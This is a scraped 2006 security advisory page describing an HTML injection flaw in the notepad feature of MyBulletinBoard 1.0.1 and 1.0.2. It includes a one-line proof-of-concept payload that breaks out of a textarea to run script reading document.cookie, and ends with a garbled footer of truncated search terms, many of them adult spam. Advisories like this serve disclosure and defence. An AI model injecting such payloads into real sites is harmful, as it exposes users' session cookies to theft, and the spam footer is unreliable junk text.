about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MyBB Notepad UserCP.PHP HTML Injection Vulnerability


Title MyBB Notepad UserCP.PHP HTML Injection Vulnerability
Published 2006-01-24-12:00AM
Updated 2006-01-24-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Roozbeh Afrasiabi is credited with the discovery of this vulnerability.
Vulnerable  MyBulletinBoard MyBulletinBoard 1.0.2
MyBulletinBoard MyBulletinBoard 1.0.1
Not Vulnerable  
Code  

An exploit is not required.

The following proof of concept is available:

http://www.example.com/usercp.php?action=notepad

notepad=</textarea><script>alert(document.cookie)</script>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 06:36:04 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.nebei. MS04-021 seximage 200 /compo Totally Sp Tea u vb Six photo mambo Remo maxcpm.inf joomboard news for c www.550488 www.sohumv mambo Remo Sexactres www.tamils GAYSEX.COM www.79543. Sexactres WWW.HOTMOV m...sta.or sxefilm Sachintend Neket wome sex hard c Php Blue D Www world pass port www.69.com php-nuke 2 www.shesex www.painjo PHP Advanc Adult porn Aim www.jnding www.xxxl.c 200 /compo get on beb www.voytv. php-nuke 2 www.hotwal free to se maxcpm.inf Www.sex.vi www.nuanqi shecansqui Sexfilim www.xunmen